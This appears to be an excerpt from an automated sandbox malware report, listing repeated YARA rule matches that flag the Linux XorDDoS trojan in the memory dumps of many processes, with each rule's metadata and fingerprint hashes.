            Source: 9882.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9827.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9893.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10038.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9849.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10203.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9970.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10126.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10357.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9783.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10049.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
